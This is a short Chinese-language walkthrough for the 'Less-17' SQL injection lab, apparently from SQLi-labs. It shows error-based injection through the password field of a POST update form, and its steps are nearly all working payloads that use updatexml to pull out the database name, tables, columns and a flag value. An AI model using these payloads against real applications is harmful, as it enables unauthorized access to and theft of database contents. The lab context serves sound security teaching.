Less-17

Less-17 POST - Update Query- Error Based - String (基于错误的更新查询POST注入)

在本关中，我们要知道用户名，对密码处的值进行操作，才能进行下面的操作。

1.判断是否存在注入

uname=admin&passwd=a'&submit=Submit

报错回显 => 存在注入

2.判断参数类型

uname=admin&passwd=1 and 1=1&submit=Submit

正确回显 => 字符型

4.查看所在数据库

 uname=admin&passwd=1' and updatexml(1,concat(0x7e,database(),0x7e),1)#&submit=Submit

5.查看数据库的表

 uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)#&submit=Submit

6.查看ZULae9ih表中的列

uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='ZULae9ih' limit 1,1),0x7e),1)#&submit=Submit

7.查看表中的flag列中的数据

 uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select flag from ZULae9ih limit 3,1),0x7e),1)#&submit=Submit

8.显示不完全

 uname=admin&passwd=1' and updatexml(1,concat(0x7e,right((select flag from ZULae9ih limit 3,1) ,31),0x7e),1) #&submit=Submit